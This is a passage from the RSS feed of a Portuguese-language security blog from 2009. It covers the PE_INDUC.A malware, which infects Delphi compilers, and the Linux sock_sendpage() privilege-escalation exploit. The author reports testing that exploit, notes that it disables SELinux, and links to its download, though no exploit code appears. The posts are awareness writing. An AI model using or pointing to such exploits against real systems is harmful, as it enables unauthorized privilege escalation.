<p>Fica a pergunta no ar &#8230; realmente nos preocupamos em analisar todas as ações que os sistemas que implantamos em nossas redes executam ou simplesmente os implementamos e esperamos que eles façam  o que se propõe ?!??!?! será que não temos nenhum caso como o citado acima em nosso ambiente e nem ao menos nos demos conta ?! ficam as perguntas no ar !!!!</p>
<p>Segue o link de um malware que faz exatamente o que foi citado neste artigo, ou seja, infecta um compilador Delphi e passa a injetar códigos maliciosos nos executáveis gerados a partir dele.</p>
<p><a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE%5FINDUC%2EA" target="_blank">Malware PE_INDUC.A</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/163/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/163/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/163/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=163&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/08/27/virus-esse-e-o-meu-erp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### Kernel Exploit &#8211; sock_sendpage() ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/08/26/kernel-exploit-sock_sendpage/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/08/26/kernel-exploit-sock_sendpage/#comments</comments>
		<pubDate>Wed, 26 Aug 2009 18:43:44 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=140</guid>
		<description><![CDATA[Nos últimos dias foram publicadas diversas vulnerabilidades de NULL Pointer Dereference, principalmente para o kernel do linux. Estas vulnerabilidades utilizam um bug já conhecido, onde o ponteiro de uma função não é validado antes de ser referenciado, assim como o ponteiro está em uma posição de memória nula (0×0000000) o usuário pode interagir com ele e [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=140&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Nos últimos dias foram publicadas diversas vulnerabilidades de <em>NULL Pointer Dereference, </em>principalmente para o kernel do linux. Estas vulnerabilidades utilizam um bug já conhecido, onde o ponteiro de uma função não é validado antes de ser referenciado, assim como o ponteiro está em uma posição de memória nula (0×0000000) o usuário pode interagir com ele e tomar controle sobre o apontamento do ponteiro. O último exploit publicado utiliza o &#8220;sock_sendpage()&#8221;  e um dos pontos interessantes do exploit é que ele é capaz de desabilitar camadas de proteção do Linux como o SElinux. (meu amigo Bruno publicou alguma coisa sobre NULL Pointer Dereference em seu blog <a href="http://g0thacked.wordpress.com/" target="_blank">g0thacked</a>)</p>
<p>Fiz um teste com o exploit em um Debian Etch com o kernel 2.6.18-6-686 e o exploit conseguiu escalar privilégios, desabilitando o SElinux que estava em execução no sistema operacional. Abaixo segue a captura de tela da execução do exploit.</p>
<p style="text-align:center;">
<div id="attachment_150" class="wp-caption aligncenter" style="width: 520px"><img class="size-full wp-image-150" title="Run Exploit" src="http://safeorunsafe.files.wordpress.com/2009/08/sock_send1.jpg?w=510&#038;h=251" alt="exploit - sock_sendpage() em ação" width="510" height="251" /><p class="wp-caption-text">exploit - sock_sendpage() em ação</p></div>
<p>Mesmo sendo um &#8220;local exploit&#8221;, ele se torna muito perigoso devido a sua capacidade de desabilitar mecanismos de proteção como o SElinux, somada ao fato de muitos administradores de sistemas manterem usuários &#8220;comuns&#8221; em seus sistemas linux, com senhas fracas ou mesmo sem senhas. Em um simples scan na internet utilizando ferramentas de <em>brutal force </em>é impressionante a quantidade de usuários / senha de sistemas linux que são obtidas. Somado a esta lista um exploit com estas características os administradores de rede terão mutias dores de cabeça.</p>
<p>O exploit encontra-se diponível no <a href="http://www.milw0rm.com" target="_blank">milw0rm</a> e pode ser baixado a partir deste link: <a href="http://www.milw0rm.com/exploits/9435" target="_blank">sock_sendpage()</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/140/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=140&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/08/26/kernel-exploit-sock_sendpage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>

		<media:content url="http://safeorunsafe.files.wordpress.com/2009/08/sock_send1.jpg" medium="image">
			<media:title type="html">Run Exploit</media:title>
		</media:content>
	</item>
		<item>
		<title>### Go Back ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/08/26/go-back/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/08/26/go-back/#comments</comments>
		<pubDate>Wed, 26 Aug 2009 12:07:30 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Sem categoria]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=134</guid>
		<description><![CDATA[Após alguns meses (sexta-feira fariam três meses) de inatividade estou de volta com força total ! Neste período sem posts, estive envolvido em muitos projetos e com isso acabei não conseguindo organizar meu tempo, mas a partir de agora estarei melhor organizado para poder manter o blog atualizado. Também tenho como objetivo conseguir duas certificações [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=134&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Após alguns meses (sexta-feira fariam três meses) de inatividade estou de volta com força total ! Neste período sem posts, estive envolvido em muitos projetos e com isso acabei não conseguindo organizar meu tempo, mas a partir de agora estarei melhor organizado para poder manter o blog atualizado. Também tenho como objetivo conseguir duas certificações (MCSO e CISSP) até o meio do ano de 2010, então vou aproveitar para publicar posts relacionados a estes estudos e a alguns projetos que tenho desenvolvido.</p>
<p>O blog também esta de cara nova, finalmente criei vergonha na cara e fiz um banner um pouco mais personalizado para o blog, espero que todos gostem.</p>
<p>Por enquanto é isto, mas logo novos posts estarão no ar com muitas novidades ! Um abraço a todos.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/134/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/134/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/134/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=134&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/08/26/go-back/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
	</channel>
</rss>
